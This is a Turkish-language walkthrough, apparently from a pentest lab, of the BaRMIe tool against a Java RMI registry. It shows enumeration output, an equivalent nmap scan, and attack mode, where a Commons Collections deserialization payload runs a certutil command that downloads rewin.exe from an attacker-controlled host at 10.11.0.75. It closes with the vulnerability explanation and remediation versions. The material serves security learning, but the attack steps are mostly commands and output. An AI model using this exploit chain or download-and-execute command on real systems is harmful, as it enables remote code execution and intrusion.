BaRMIe, Java RMI (Uzaktan Yöntem Çağırma) hizmetlerini tespit etmek ve bunlara saldırı düzenlemek için kullanılan bir araçtır. Eski bir araç olmasının yanında hala kullanmak için işlevseldir.
Çalıştırma Örnekleri
java -jar BaRMIe_v1.01.jar -enum 10.0.0.1 1100
▄▄▄▄ ▄▄▄ ██▀███ ███▄ ▄███▓ ██▓▓█████
▓█████▄ ▒████▄ ▓██ ▒ ██▒▓██▒▀█▀ ██▒▓██▒▓█ ▀
▒██▒ ▄██▒██ ▀█▄ ▓██ ░▄█ ▒▓██ ▓██░▒██▒▒███
▒██░█▀ ░██▄▄▄▄██ ▒██▀▀█▄ ▒██ ▒██ ░██░▒▓█ ▄
░▓█ ▀█▓ ▓█ ▓██▒░██▓ ▒██▒▒██▒ ░██▒░██░░▒████▒
░▒▓███▀▒ ▒▒ ▓▒█░░ ▒▓ ░▒▓░░ ▒░ ░ ░░▓ ░░ ▒░ ░
▒░▒ ░ ▒ ▒▒ ░ ░▒ ░ ▒░░ ░ ░ ▒ ░ ░ ░ ░
░ ░ ░ ▒ ░░ ░ ░ ░ ▒ ░ ░
░ ░ ░ ░ ░ ░ ░ ░
░ v1.0
Java RMI enumeration tool.
Written by Nicky Bloor (@NickstaDB)
Warning: BaRMIe was written to aid security professionals in identifying the
insecure use of RMI services on systems which the user has prior
permission to attack. BaRMIe must be used in accordance with all
relevant laws. Failure to do so could lead to your prosecution.
The developers assume no liability and are not responsible for any
misuse or damage caused by this program.
Scanning 1 target(s) for objects exposed via an RMI registry...
[-] An exception occurred during the PassThroughProxyThread main loop.
java.net.SocketException: Socket closed
[-] An exception occurred during the ReplyDataCapturingProxyThread main loop.
java.net.SocketException: Socket closed
RMI Registry at 10.0.0.1:1100
Objects exposed: 1
Object 1
Name: creamtec/ajaxswing/JVMFactory
Endpoint: 10.0.0.1:49161
Classes: 3
Class 1
Classname: java.rmi.server.RemoteStub
Class 2
Classname: java.rmi.server.RemoteObject
Class 3
Classname: com.creamtec.ajaxswing.core.JVMFactory_Stub
1 potential attacks identified (+++ = more reliable)
[---] Java RMI registry illegal bind deserialization
0 deserialization gadgets found on leaked CLASSPATH
[~] Gadgets may still be present despite CLASSPATH not being leaked
Successfully scanned 1 target(s) for objects exposed via RMI.
Nmap ile eşdeğer komut
sudo nmap -sSVC --script rmi-dumpregistry -p 1100 10.0.0.1
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-02 01:16 CEST
Nmap scan report for 10.0.0.1
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
1100/tcp open java-rmi Java RMI Registry
| rmi-dumpregistry:
| creamtec/ajaxswing/JVMFactory
| com.creamtec.ajaxswing.core.JVMFactory_Stub
| @10.0.0.1:49161
| extends
| java.rmi.server.RemoteStub
| extends
|_ java.rmi.server.RemoteObject
MAC Address: 00:50:56:93:08:41 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.14 seconds
Saldırı modu
-attack
seçeneğini ekleyin.
Deserialization payloads for: 10.0.0.1:1100
1) Apache Commons Collections 3.1, 3.2, 3.2.1
2) Apache Commons Collections 4.0-alpha1, 4.0
3) Apache Groovy 1.7-beta-1 to 2.4.0-beta-4
4) Apache Groovy 2.4.0-rc1 to 2.4.3
5) JBoss Interceptors API
6) ROME 0.5 to 1.0
7) ROME 1.5 to 1.7.3
8) Mozilla Rhino 1.7r2
9) Mozilla Rhino 1.7r2 for Java 1.4
10) Mozilla Rhino 1.7r3
11) Mozilla Rhino 1.7r3 for Java 1.4
12) Mozilla Rhino 1.7r4 and 1.7r5
13) Mozilla Rhino 1.7r6, 1.7r7, and 1.7.7.1
a) Try all available deserialization payloads
Select a payload to use (b to back up, q to quit): 1
Enter an OS command to execute: certutil.exe -urlcache -split -f http://10.11.0.75:8000/rewin.exe rewin.exe
[~] Starting RMI registry proxy...
[+] Proxy started
[~] Getting proxied RMI Registry reference...
[~] Calling bind(PAYLOAD, null)...
[~] Attack completed but success could not be verified.
Remediation advice (if attack was successful):
[Java] Update to Java 6u141, Java 7u131, Java 8u121, JRockit R28.3.13 or greater.
[Apache Commons Collections] Update to Apache Commons Collections 3.2.2 or greater.
Attack: Java RMI registry illegal bind deserialization [---]
Java version 6u131, 7u121, 8u121 and below, and JRockit R28.3.12 and below do not validate the types of the parameter to the RMI Registry.bind() method at the server side prior to deserializing them. This enables us to inject a deserialization payload at the network level by replacing either parameter to bind() with a payload object.